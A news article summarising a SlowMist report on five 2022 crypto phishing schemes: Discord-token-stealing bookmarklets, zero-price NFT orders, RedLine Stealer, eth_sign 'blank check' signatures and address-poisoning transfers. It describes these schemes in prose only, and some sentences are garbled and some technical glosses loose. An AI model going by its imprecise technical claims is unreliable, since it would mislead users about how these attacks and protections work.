5 Sneaky Tricks Crypto Phishing Scammers Used in the Last Year – SlowMist

Blockchain security firm SlowMist has highlighted five common phishing techniques used by crypto scammers on victims in 2022, including malicious browser bookmarks, bogus sales orders, and trojan malware spread on messaging app Discord.

It comes after the security firm logged a total of 303 blockchain security incidents during the year, with 31.6 percent of those incidents caused by phishing, pull pulls or other scams, according to a 9-year SlowMist blockchain security report. January.

A pie chart of attack methods in 2022 as a percentage. Source: SlowMist

Malicious browser bookmarks

One of the phishing strategies uses bookmark managers, a feature found in most modern browsers.

SlowMist said the scammers used them to gain access to a project owner’s Discord account.

“By bookmarking JavaScript code through these phishing pages, attackers can potentially gain access to a Discord user’s information and take over a project owner’s account permissions,” the company wrote.

After guiding victims to add the malicious bookmark through a phishing page, the scammer waits until the victim clicks the bookmark while logged into Discord, which activates the implanted JavaScript code and sends the victim’s personal information to the Discord channel of the scammer.

During this process, the scammer can steal a victim’s Discord token (encryption of a Discord username and password) and thus gain access to their account, which allows them to post fake messages and links to more phishing scams by posing as the victim.

“Zero Dollar Purchase” NFT Phishing.

Out of 56 serious NFT security breaches, 22 of them were the result of phishing attacks, according to SlowMist.

One of the most popular methods used by scammers tricks victims into signing NFTs for virtually nothing through a fake sales order.

Once the victim signs the order, the scammer can then buy the user’s NFTs through a marketplace at a price determined by them.

Cast your vote now!

“Unfortunately, it is not possible to deauthorize a stolen signature through sites like Revoke,” wrote SlowMist.

“However, you can deauthorize any previous pending orders you had set, which can help mitigate the risk of phishing attacks and prevent the attacker from using your signature.”

Trojan horse currency theft

According to SlowMist, this type of attack usually occurs via private messages on Discord where the attacker invites victims to participate in testing a new project, then sends a program in the form of a compressed file that contains an executable file of about 800 MB.

After downloading the program, it will scan files containing key phrases such as “wallet” and upload them to the attacker’s server.

“The latest version of RedLine Stealer also has the ability to steal cryptocurrency by scanning the digital currency wallet information installed on the local computer and uploading it to a remote control machine,” said SlowMist.

“In addition to stealing cryptocurrency, RedLine Stealer can also upload and download files, execute commands, and return periodic information about the infected computer.”

An example of RedLine Stealer in action. Source: SlowMist

Phishing eth_sign with “blank check”.

This phishing attack allows scammers to use your private key to sign any transaction they choose. After linking your wallet to a scam site, a signature application box with a red warning from MetaMask may appear.

After signing, attackers gain access to your signature, allowing them to create any data and ask you to sign it via eth_sign.

“This type of phishing can be very confusing, especially when it comes to authorization,” the company said.

Same final number transfer scam

For this scam, attackers drop small amounts of tokens, such as 0.01 USDT or 0.001 USDT to victims often with a similar address, except for the last few digits in hopes of tricking users into accidentally copying the wrong address into their account history. transfers.

An example of a phishing attempt with the same ending number. Source: SlowMist

The remainder of the 2022 report covered other blockchain security incidents throughout the year, including contract vulnerabilities and the loss of private keys.

Related: DeFi-type projects received the most attacks in 2022: report

There were approximately 92 attacks that exploited contract vulnerabilities during the year, totaling nearly $1.1 billion in losses due to flaws in the design of smart contracts and compromised programs.

Private key theft, on the other hand, accounted for about 6.6% of attacks and resulted in losses of at least $762 million, the most notable examples being the Ronin Bridge and Harmony’s Horizon Bridge hacks.